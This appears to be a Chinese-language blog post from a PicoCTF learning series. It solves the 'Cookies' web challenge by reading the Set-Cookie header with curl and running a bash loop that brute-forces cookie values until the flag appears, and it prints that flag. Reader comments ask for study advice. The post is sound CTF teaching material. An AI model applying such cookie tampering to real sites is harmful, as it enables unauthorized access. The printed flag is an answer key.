iT邦幫忙

2021 iThome 鐵人賽

DAY 9
1

哈囉各位安安
今天是連續發文的第10天
我沒囤文,每天當下產文完成1/3了 灑花~
ㄟ我會不會太早慶祝
不要烏鴉嘴,我一定會成功完賽的
要是當老鼠屎一萬就飛了 QQ
讀者可以留言跟我互動,告訴我你讀完的感覺
會不會寫不夠詳細,怎樣可以更好都歡迎跟我回饋~

我們開工吧!今天是第10天,我想來個小複習
所以今天解的題型概念會是前幾天解過的Cookie
GO ~

Cookies

Who doesn't love cookies? Try to figure out the best one. http://mercury.picoctf.net:64944/
No Hints

我們上面連結點下去,會出現這畫面

我開始亂輸入,都會顯示無效登入
snickerdoodle
右鍵檢視原始碼

<div class="col-xs-12 col-sm-12 col-md-12">
				<h3>Welcome to my cookie search page. See how much I like different kinds of cookies!</h3>
			</div>

檢查一下從服務器獲得的Cookie

┌──(user@kali)-[/media/sf_CTFs/pico/Cookies]
└─$ curl -s http://mercury.picoctf.net:27177/ -I | grep Cookie
Set-Cookie: name=-1; Path=/

如果我們試試更改不同的Cookie名字會怎樣?

┌──(user@kali)-[/media/sf_CTFs/pico/Cookies]
└─$ curl -s http://mercury.picoctf.net:27177/ -H "Cookie: name=0;" -L | grep -i Cookie
    <title>Cookies</title>
            <h3 class="text-muted">Cookies</h3>
          <!-- <strong>Title</strong> --> That is a cookie! Not very special though...
            <p style="text-align:center; font-size:30px;"><b>I love snickerdoodle cookies!</b></p>

我們用暴力解來搜尋那特別的Cookie數字吧

┌──(user@kali)-[/media/sf_CTFs/pico/Cookies]
└─$ for i in {1..20}; do
for>     contents=$(curl -s http://mercury.picoctf.net:27177/ -H "Cookie: name=$i; Path=/" -L)
for>     if ! echo "$contents" | grep -q "Not very special"; then
for then>         echo "Cookie #$i is special"
for then>         echo $contents | grep "pico"
for then>         break
for then>     fi
for> done
Cookie #18 is special
            <p style="text-align:center; font-size:30px;"><b>Flag</b>: <code>picoCTF{3v3ry1_l0v3s_c00k135_064663be}</code></p>

Flag出來囉~
flag: picoCTF{3v3ry1_l0v3s_c00k135_064663be}
解完收工

明天又是快樂星期六,令人期待的滑板課

大家晚安


上一篇
[ Day8 ] Web 小回歸
下一篇
[Day10] Web 小快樂
系列文
從 PicoCTF 中跨領域學資訊安全30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

1 則留言

0
whaaaaazup
iT邦新手 5 級 ‧ 2021-09-29 14:58:25

您好,我是一個想踏進資安領域的大學生,雖然是資工系但是對於資安真的毫無概念
很想利用課餘時間增進自己的知識,也訂了目標想在未來參加看看競賽,畢竟學校完全不會教這種東西...
在查各種入門的文章時,有幸看到您的系列文章
剛好自己有些網頁的知識,加上您的文章都很淺顯易懂,所以目前覺得入門的很輕鬆
也學到了很多自己以前不知道的網頁知識,像是robot.txt
但是我想要花更多時間投入其中,不想單只是刷刷CTF,也想同時補一些知識
不知道等您完賽時願不願意分享自己入門資安的過程
以及對於我這種學生適合的學習地圖和資源(因為網路上的其它資料都有點艱澀難懂,對新手不太友善,感覺有點越級打怪,就算有也不知道要從哪裡開始下手)
非常感謝您看完我的留言

Yvonne iT邦新手 4 級 ‧ 2021-09-29 20:43:42 檢舉

先謝謝你願意閱讀我的文章,
我一開始也是從iT幫幫忙的文章學習成長的
完賽時會分享我入門資安的心路歷程嗷:)

Yvonne iT邦新手 4 級 ‧ 2021-10-03 08:34:52 檢舉

推薦加入台科資安社的資源平台喔,
學生200元
有題目練習,可以問問題,強者解答
https://ntusthack.feifei.tw/shop/

我要留言

立即登入留言